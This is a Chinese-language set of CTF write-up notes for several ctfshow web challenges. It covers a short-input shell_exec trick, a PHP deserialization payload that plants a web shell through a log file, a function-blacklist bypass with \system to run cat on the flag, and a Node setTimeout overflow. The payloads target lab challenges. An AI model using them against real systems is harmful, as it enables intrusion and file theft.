【nl】难了

 <?php
show_source(__FILE__);
error_reporting(0);
if(strlen($_GET[1])<4){echo shell_exec($_GET[1]);
}
else{echo "hack!!!";
}
?>
//by Firebasky
//by Firebasky 

?1=>nl    //先写个文件
?1=*>b   //这样子会把所有文件名写在b里面，诶那是不是我们再访问b文件就执行了nl命令了

红包一

查看源代码发现getFlag()

控制台调用即可

一切看起来都那么合情合理

扫后台然后发现源码
inc.php

class User{public $username;public $password;public $status;function __construct($username,$password){$this->username = $username;$this->password = $password;}function setStatus($s){$this->status=$s;}function __destruct(){file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));//写入文件可以利用这个来写命令}
}

index.php

if(isset($_SESSION['limit'])){$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);  //进行base64加密$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);}else{setcookie("limit",base64_encode('1'));$_SESSION['limit']= 1;}

check.php

require_once 'inc/inc.php';   //找到了点

<?php
class User{public $username;public $password;public $status;function __construct($username,$password){$this->username = $username;$this->password = $password;}function setStatus($s){$this->status=$s;}}
$a=new User("1.php","<?php system('cat /fl*');?>");echo serialize($a);
由于是拼接写入所以前面要加管道符
|O:4:"User":3:{s:8:"username";s:5:"1.php";s:8:"password";s:26:"<?php system('cat fl*');?>";s:6:"status";N;}
fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4OiJwYXNzd29yZCI7czoyNjoiPD9waHAgc3lzdGVtKCdjYXQgZmwqJyk7Pz4iO3M6Njoic3RhdHVzIjtOO30K
?>

我们写入的文件名为log-1.php

没做出来，服了
应该是在inc/inc.php发包然后查看log-1.php
但是我的404了

红包题 耗子尾汁

error_reporting(0);
highlight_file(__FILE__);
$a = $_GET['a'];
$b = $_GET['b'];
function CTFSHOW_36_D($a,$b){$dis = array("var_dump","exec","readfile","highlight_file","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents","");$a = strtolower($a);if (!in_array($a,$dis,true)) {forward_static_call_array($a,$b);}else{echo 'hacker';}
}
CTFSHOW_36_D($a,$b);
echo "rlezphp!!!"; 

我们用反斜杠\绕过

forward_static_call_array($a, $b);：如果条件成立，则调用 forward_static_call_array() 函数，其作用是调用静态方法，具体参数含义如下：$a：表示要调用的静态方法名。
$b：是一个数组，包含了要传递给静态方法的参数列表。

?a=\system&b[]=ls
?a=\system&b[]=cat f*

新年好？

const express = require('express');
const fs = require('fs');
const flag = require('./flag')
const app = express();app.get('/flag', function (req, res) {   //看出来必须是在/flag页面function getflag(flag) {res.send(flag);}let delay = 10 * 1000;   这里定义是1e4所以自然就会超时if (Number.isInteger(parseInt(req.query.delay))) {delay = Math.max(delay, parseInt(req.query.delay));}const t = setTimeout(getflag, delay,flag);setTimeout(() => {clearTimeout(t);try {res.send('Timeout!');} catch (e) {}}, 1000);
});
app.get('/', function (req, res) {res.set('Content-Type', 'text/javascript;charset=utf-8');res.send(fs.readFileSync('./app.js'));
});app.listen(3000, '0.0.0.0', () => {console.log('Start listening')
});

浏览器内部使用32位带符号的整数，来储存推迟执行的时间。这意味着setTimeout最多只能推迟执行2147483647毫秒（24.8天）超过这个时间会发生溢出。

只要让其溢出就会回显flag的内容

/flag?delay=2200000000

Log4j复现

弹shell欠着